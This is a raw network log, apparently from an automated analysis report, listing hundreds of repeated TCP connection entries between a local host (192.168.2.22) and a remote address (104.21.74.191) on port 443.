                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
